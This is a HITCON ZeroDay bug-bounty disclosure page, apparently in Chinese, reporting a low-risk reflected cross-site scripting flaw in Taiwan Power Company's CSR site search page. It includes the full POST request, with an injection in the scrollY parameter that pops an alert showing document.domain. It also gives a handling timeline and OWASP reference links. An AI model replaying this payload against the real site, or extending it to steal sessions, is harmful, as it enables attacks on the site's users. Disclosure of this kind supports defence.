[Bounty] 台灣電力公司 Reflected Cross-Site Scripting - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2020-01003
  •  發信 Vendor: 台灣電力公司
  • Title: [Bounty] 台灣電力公司 Reflected Cross-Site Scripting
  • Introduction: Reflected Cross-Site Scripting

處理狀態

目前狀態

公開
Last Update : 2021/02/06
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2020/12/07 19:09:24 : 新提交 (由 Hzllaga 更新此狀態)
  • 2020/12/08 12:40:02 : 新提交 (由 Hzllaga 更新此狀態)
  • 2020/12/09 18:02:01 : 新提交 (由 Hzllaga 更新此狀態)
  • 2020/12/10 16:23:37 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2021/02/06 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2020-01003
  • 通報者:haihai (Hzllaga)
  • 風險:低
  • 類型:反射型跨站腳本攻擊 (Reflected Cross-Site Scripting)

參考資料

攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。

漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://csr.taipower.com.tw/TC/search.aspx

敘述

昨天挖到的,不過弄到一半網站就503了,到現在還沒恢復服務,我就直接拿昨天的截圖來提交了:

https://csr.taipower.com.tw/TC/search.aspx?q=%u6c38%u7e8c%u7e3e%u6548#gsc.tab=0

POST(scrollY參數):

__VIEWSTATE=UJsW28fvWncfLgVhiVvxD9An1a5ygcq2aWOe31XIEOh%2FqcBUvN1f8%2BHLG52DjzqS1yJQy4BPhatIRJ4smIt3tnS%2BycjugRUZXvgcuoFQzd1xDx7g7CJxodbZ8ReLo0veL5klzRorgDU7KKbMczzFu4mMygLVTZnz2gCgwX9PFhthB6GI0v%2Fe%2FP1JVESH2MrDRxcfWgm3ZhHkh2hZSgKSzAPXinOoh5nYaTnjWABepZrloFHC00pF5uYkxiiPWzBqGzpSf%2F1pViTczXLmnll5T%2BYarONt4VWC1iMy7T1Tn3l%2FBihB7G6EUh0qdOLLOZggcqlCmV%2BDUqj6B%2BgniDt8R8f3aQstJoaTcKB9oFDsmEKCfRXrinwrJpaa25SkdAlKkbp3uT0Xe1ZIMA9ZaYOmUfgyW1c0bORESxqYjW0ux9eHc53GMUzWDAuOaEpqICnE7rfS5e28WjNyM361H4Zbr9vmSO4I94mbwHKsP%2Bkjd7eqFkzwZauqnI8%2FVnTbfgtnadyiMiJYa4TrLPqmhn1iNvvURQjbz0ic%2BAqKq1Ue0rxshTOYD1EFDvpH9Igr8QP8beOIZlMwe9Z%2FD3k68meQN5I5ieAQsCjTHEdkcCL%2Fjh8uY7PCobhpDPZO17JNdvAJgtVWieFj4A7z5uPkKToXUJippNUe4CkBOSmXSqwl5aBZIg3wz97Z3B8nV457mQ2HuTYqMA2KFgPJ%2B2IXfdRFAI27Wl6TNyVgwpBRHRJtKF4xW%2Bd6zuenIKYtcl8C5qILq7jfazy29xd%2FNbUphL430V26aw0TakNOiuzE0Xb7ODiCOmcWsIdJYR3%2FWuj%2BzSkWQF2%2B3c5oj0ipDT2CYLhMyJHL154xUcMUpTCn8WoyD1Jb8TizxROAd2QuD4I3GgatHVNJa%2B85XN3vghFjQvDs3RDGGywtRibz4uNXNykZmmIfA4Xz1X5kTdeCn6%2Fuc9XlPTv2DQOE24xjiva%2FdGL6kiuB1RHiWVCTXctMD%2B9t%2Fr%2BqHYnOc5yrvuFZUxQ8Cs0S%2FQ17zVeo%2Bqdojg%2FlEEtEUKQPwVx421tRAO%2BErH3%2FtW3tiX7DGio4iAR6IZQeewCT0CxfwHQCz4PvJQ0ePs0MlRYXvr%2Fo2iS8hv5KqNda9A9%2F5uEXyDIyI5HGuo09%2BVRTB5pOctsIk3fYJN5XIHkvLVdk%2BQPqGgZNR0YvFsajaeaqsnjypcH2vHDzYG62YiDQeWpS50YJa3oqVJy2k2NmwTWQshCCMyWBfrIrgtHGuHFOGLuvZYAbQJNnG8MgWYw1XuBYcmfcbg%2BdHAhnla2alXHUtp%2FOWClf9TsC28o55t25VozOGS9fUZ9NiUyk%2BV9qM46cN69LwmyhhXLrxU6tgYLb3mBmgyCjuSDLaLr4%2BSL2doNvB8RyZO%2FIJCAjusKyvhObkhFdAcyLNavADXsYIdCwitmsLWafYYe%2BPgd3nH3RwIFAL47RfiRPJLK8dcqfR2ttoJ0PocZ%2FVLSZJGycsbua88ajPObjtuq%2F6O93lr7C9i%2BjEsbVoG30049okcrBt7db22Hciw2VzcVw3qMCwXgYq%2FZ4bdiNQ20s9rl39CcY1hn2L7ioMx4DiKPXSWTQ99XZY8L90zWXSesNMnSCrSYBCCdob4Ux35ZAeSnQcoxMZaE%2FPL2tngFKuQK9zolvLkHQbuq5EOwt4JDNdTbk%2F9LGspKUEefMg2jhcyoyl9MLGaq1Fk1I3GI7ePpJwUnT29Kq7ncBTJtk6OSXrl%2F5gX7tQRpYIR9s3SJQ%2BaKnKNSzrGYHvtUPSDIOwBSjR1nIrS9B1JVuLWYqGJbz1D%2Bkcr%2F5wAa0IzkTkmicl%2FzMfTaye91ClcUniG851%2BU2yokbgSEm02gnpdXWidp3ys9G%2BW%2BWVftwfgBuVUuFq9QwwRnIeCu9gJdRIGoU%2F%2FNUGwVMZSX2Iy0PF6XJSjxSYEXWwvbz4jbNZI8ESkoNHbu6RR1GAADSo%2F4POH94xoScH3vaumBcinN5Q8vK3OKW2Z1KI7fwF8baJVxGjSWJD%2Fwon2rnTsLcXFjhqpdokmTMYI79FBK6SVX%2BSGjkRNtT8%2Bym%2BfTekX8GJMZgXtVgTM6hjzUY4p7Y7DZmjsxwU%2FykaX08fh3GXfe1JFMrEDAo4Gx4rwWyQpOHWfavUxAEaEfCzIpzLCtkT13N86qhycouI3BLb4DZnGujPXG2DIodMcZwMvNEEV4qGXaza6crZC94aHAJ4VhL3fzz3HCrr7jvnRtQVRXN2l5Yb0QbrtPaXOsU00TI53wJ8EyU2v4V3FuF%2BvJemzsiQ7XRh6oV7QAfKKXIbrUYzXE%2B0YoZavxf%2FU997w1gRBSleQQsTHWeig24mFUy90B6yqJ5be4MENMmtDgtlnKy1RUKUKQH5v1jApwZHQmP88vRubmgQ0bkYvntIBfKXvDkdnM9RKApS3Ho9iDaDsxjb64HK55wHbasdmhDJkx5FwOE9y4i57ABpAgvk8IgXUV57cJsYSmMCESa9rvXH1LNMFjfBACBEup3VFVhEH6NZX7FtmvbrmWhf6XeRhLBVlvVzlF%2FRmYZ2NDyLspLC0B6UFEahTPZj4pqKFN1V9QP2BXlhn9z65Y2UttoDVFFuOPOvaQwGE%2Bt1UkJIKmw6UpnK51VvkabQYQgtypmnC7W5Svn1Z8i%2B9qkIItJhD2xiimcNlSNFqCejBtfpW1%2BdIRlZuOcy4Ao1in9H%2F7YimDQMELveHK766ExhCCBhhbEe56HGTQL7vHzH2vt%2FJsZ8sg6eryIfUlSanbM3LEZUtr%2Bui6YVb5C%2BF3vYtmg08%2FY70Zn2xlGny36B0fIMxkn6LVwNc2KYlPARFkvmVoBEZ%2B88UV8zXTbrE8lG1Y6I2zHw7apETXGaOsRCk8VY7aS5xk5TOrBzoacepwQ3QHhDOw9nSAliPP1zKwXZhnATCYGwiFRvQIn2CDvKEKMG0ZxqAGPksrSNcSxqAtOWrUeCHhERGie6FrsyJMdbttK0NkNhHoM0pJFoyfAsod9FOf10G21N%2BmGrh6n%2Fu5sLPPWKoD8GUZFs054%2Frf6QyXGb%2Bk%2F10K9GNcCC%2Bh4NGfm6a0h4TomUfDU4MbpItgHGqGtFLNcCCLX8I1e27CYr7QmBrEY9rrfgm9fAXXMmcqQs7SQT%2BAU0Iio8cb5hU5kKbWzDBz%2BUzDWzvcyrxtyBfu4gaSYQ%2BlWTJFBcYPCpEdcddmaIyYh0NSL%2BNpDs0TnCIP61%2FQ8Wj0%2FgmqfkPc9R8ZPyUQPUnyEvY6elwafzEZh0%2FTUqvy%2BDgRKpv9gSqeF0PaUtJy8aQcOgGzB4nfAhctzuOg8vIE91tTpwHr1tJszMFuxG0pb4O0SduQ4acg1PHHQMMKS5r31YuluxQ4El5rLju0p5PuOoMGaTREbL1Lv6%2BRWY46b04DxUT7xdjdq97mQkhqEVaFQc3uzcs7aDx84uUiBabbAVzM%2Fm818xx%2FVjE9ewMB3qs%2BpmpLdCjr4BjZaC6OOIqt6Wx9drjFdGDUok4ehjg3zLxdycsMon8QrsVb6FokdyeU09M%2BD%2Be8OYZs8I2ZVzZABUJfQB%2F7TzQCmj6LWfyooedTSM9%2BGwCd%2Bldo3axSSQrIWLmAkHRjFkhzTQHaY5B%2BaVo2CJu5GyGCYTXibGoK6a3ekU3xFVp4RCkQuNe%2BMHqiRELcV%2FdCJV%2Fcz4wtQN%2Fqb1mjYkm4QZp%2BiKlzLAaomJ8pAZ%2FR9xRyBxUFWKA10X%2B8%2F%2Fps281vaYeBh6wQ7Z0tEysyuNlh5vG8HuK2dd8vw9skaRTjSJqsN8nn%2FflGLwQZxMFukfkgtW%2BBKh4qeS4nW4pMtnhUceRSK3t71hLqc2ZVHSzUALoCVsN2ZTsD%2F6Q20EpngflY%2FfuOV1JxjcBF8IvsrJTMDCflteux%2FRdA%2FL4YzQGFHlroHHfRdMI8XABGFmvdPNB75CuCScCKlyGxXLCP0al6M0%2F5ind5oyBbIbq%2Bq6h7p%2Fc4MVR%2Bt3qyNiuVc%2BeZQAxJMIsb2FKbTRQ1DPJkpwOaCPMnMNE%2BaI%2BhwGUELCmx7DmPEmJqngks4AjexJOF%2BxMUTGdCx0VreiPtdVahLCLIl83noXq4VKV47LSPQ7aBCnXZBhSgzDQsdBie7%2FD9R3lZk5vOwpWGCcwUlrpnSrxR0Mqqvmssyym%2FESZos88Fw3vF5zjitdWUsoixrH8fS8MlssZrhxmXaAgnooIZU7uAerWU5vK3YVUMaRONPX%2B0kRzWiMmfoLUrQAK1yWBsWhGVeYHFrhr3Fyhty6y%2FrEOeLctmmXs5pd9xy9uNaIpVtNAPkGvkILX56S0yGoKSKPcrPU94mMC40CB9%2FtJvXOFzJqGBUpnCRrbE9M0by5sRw21%2F1tRSRWnFcnlaQo95YQr06TCV1EQ2NSpiXnzT66QAtx8PO05pofUK7YlQJtZaMyYwKJLHt0hStPjzpvprTCN7t2%2FULLZYPyWBRLR2ltASa4OzuAiXrMZ8Cv6y1zv30uSzQAHHlhXALZa%2BfNn9tmEqu8KfhQ8AC3DVyoWm42ti8ftDf0UBk4VVX%2F2AFyJ5olS%2BmUuM0RFs2WxrK0WsKnq5VSZgZMD7P8ck1H1IfDm5UKKZFrHv1lk4AQTLMX1JiTiI4CZomYD6oaZLh2FL%2B8waLlH8FsoPAzN9YGGURS9QH%2BTn1B7Y0wn2xhQXO8PirKngFDSapMKeJoZun0HfV5bU98oBY9YBkLgWTp3OaQHWa%2BQu%2FH7MeyK5fRPtOcDVnfA9oJ6X0BJ8Erc2RuKRinDZs399iDdo4kqUeraiq1mhhcMDI9K0%2FeP6kBWahr0SX49iyY3NnI7qp%2B6tZxu27G%2BJAPuavYRUzp4As6bQLaRpelzNrQnKJhA1XT69A7LyJgZC3NcUKDmRNlHd9spYjBUK313gDeQmnntSihtFxjIsVyEs4IUeQUwxjjKkIBBgmC94FgoVgCrOx4akr9L3NROdQQwt7jklABl%2F9J8U1y09tZLn8pzZ%2B81dBxP5FACOP5YCQdwFkHAyP7qcZhoB30zUTEnDfpzw0TWflY4OT4PyeHCeJfAsy0FYYLVfMPqylXlsFJ2lAsRewmkkNKXLUx6VqIF8jjEEIFCKrRnjvEWcTCDD0RYIbydd38iikdXGuguGzZPFBguyTdzqvgW4Jhws0M4ZwIXZevQ95XbblKoGwynDlkcUOKlyE8kkjeUi53aWvyVdpF9UFoRmYDCZg2VxYi8RzeVotmrrWAAjdK6xNqV4zm%2FbRaM1%2Fkwxj27iCga8XZ4NVZm%2BiLO6nDdVFl5OB6Ll3CGiW8ggRjtF2pzbYRGomytLlSQyDMMC2LQB3w6mtlWZmbwKUe5wIha65AShSY6hIAFuUgMYSF3FiHF%2FIHem9S9AoxV58HWEUtQU6DhL9oq8CanJrJLGwdkUaQavD0jByWGqk4AU2f2dhRjETOCNMR5Rl%2FuskcJWtf3F5vUhK1EaycvjGv5oxlBUgB6OBiN3EJY6frcQp5DGYUnK4GEWA%2FwFuYh%2BWXtRoU14Uuiq6h9RA4nTLVIn8HVoyEyS36BpUdDcVOGfUOCmF2vf9iNzOyYzd7bs4fdI8QP%2FfJ94ujU7lfPjwe5xcvGPB9eMkF4vKQBGVtBebcY8o213OuIsp9tBR2XZiYisEQA2%2FIVHnLPMFC7Xft838KKJi0%2BLvkG1ZU6ehlb9ZBL4ljk9Boap%2FEvvXxoZuYXymSxhdyvULuv%2FswQ7WY5Fd7DOUdbJTNI1IyaGRJ5uziCFOiSZNgmbAM31t6ztvnzprZ4IjvjtRvEX%2BJWN95yd6gDA2KzwaXJCYnriszKX4vbuLESJYAqGQIRKL0PFtzy7OQghXsbjMP26i8PEDb6FA4Ao5d62lG%2BvOLg1lfps7W6yyXX3XOz6g1lNkV4ca%2FBkM6BmHKaL4o%2FEGBERM529Kmou%2FH5cfD%2BeMdld7SAvOoiz5VD4z5aU0zqJ8jT7TZoU0rhkiNrAE9MGpZwBpg3cX6oGLD72nJeLDJapoVGEQPPSu3WMjWnpKsEydaTs0EWr8Y%2BFzRcQjC1QEZ%2FZKoQQKTJBemveqRyX9x%2FM44zt5Or5pztF7iSwz9qxiUmvmRwHoLwDPUKdkoKTyTkG1A6GiMOtbLWGobUVIK%2BroZFuzk%2BAD%2BWY4MIwPUm3ym79vVMQQ4aY8leR%2BeckBZq%2FcIYLNgMyfzGqkzBlJcTJ6TDRT5ncRKiVE7gl8Hhb24spMZ4dGKX6MlXbvpVyTdMpeR6lI45ovJcU91xxomSDN9gN4DflGBpc4DwiNuY74oAxCOVfYFHDwmRXSAtiohzmwh6swqvmZCPVvWSMOBJA3ZLkw5uDwL7AaYShvTAXqIY2rxRzdFwCaFJuiGZAyjE5m%2Fo7uAReeAzNhPCYu%2BrdxhA%2BFJPbjhhOa7HLyy5TNhjbEfdtRV1%2Br%2BvTH%2FdwB9loyU3M9yfwCRSfatfWRE29KC4qlM1r789ESZRVyHQbOK6WFMwsaFcw2P3AIDNl%2FjiQpgiGDZ1RDCKAP04fQ2wvA9xneXhjfudPeQtLZmBWom%2FnjGKORKFgW%2FToBCgbz8uOwFjjvdzgTFyYRMSxhST0nbJTfnPop3MV%2BKjL1WN95z2e%2BwAorhll8Yls6SWF5mk3%2BEnqLj0TIBUDH2WE3c%2BrzMkSqRfveXQPZPEJ%2FdPPT32PGU%2Bojt9hq%2FAP4Yt7Pna73nJX%2BsS3XSHxLIGYcPTtXAkPrmimshiD3t81Rw2Ouy717iUNE%2FMt5vbJ8qqXnZoWIS7hTCQfcxuwbkAopGS4B77fHVLR0ybluG2c%2FLD1ZJYkK92JAOA%2BPmvIQdqrxWPKjjjmxZOJGNS1XmT9cCIjIZc4AIht9uxcC8Loekk7Vj3CJNRgD5nkw77pW%2BC2qeqoea31nGkGbUB9sC%2FXw%2FDZARUJXVEsyEZKNdH6kmPMzAiiQ1ghRaChMFBXLf6ksLoenEKDY5b%2FwhFB%2F8tqYPjioYGTWVQTha3edz3Ih%2BgW5lecyFHZPNAAQb8lYQJ4yH3cSC%2BTm7IJNx6jQ3PJz%2Bg5h1S64sp%2FQsn%2FwOxdiOirpXdG7d98yYAlvlNCct7ikROLY08eLJOvR%2FLNFnH6rBs7PCyQ8CLK%2FWkPlewnnMofzYe7NesKbU4nmczeimfOqAh6F1JjjLsrzyScYvvktuSoV4pHWRjNOEawtmaZf4jU2yMzlp94GAD8ADPWdbcCVZmLrBUqzJ3P4cDkllMrbWyzYupPEHaIBJwitrSKPNUU%2BAFsoudYxSxvEvq4ioBA%2B1XPHtBud7RLnbkAeZerJ%2BaYtihFf4P3c058xM9o1sHiwhhwKAIMYggzD975lISWUvDJewpMS5%2FxxFGVlBM35i2wOF5v5%2BPgWg1sfJbni4uuIjd6viW8qlO4HL2igTb1yJsPDiGZjDxtno0bN8DG6FQ7WLrye%2FAknL3zgdU55fEJZ7rhgA%2B%2BZc7cKIfHvY5ZSl%2BaSjsjtzg%2FoxM1KzYE1iLEbaTBbUUIdOv6rYg%3D%3D&__VIEWSTATEGENERATOR=6F43CF45&ctl00%24nav1%24m_googleQuery=%E8%AB%8B%E8%BC%B8%E5%85%A5%E9%97%9C%E9%8D%B5%E5%AD%97&scrollY=oykpyxje'-alert(document.domain)-'

圖片

圖片

2020/12/08 網站恢復了,補新截圖:
圖片

圖片

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;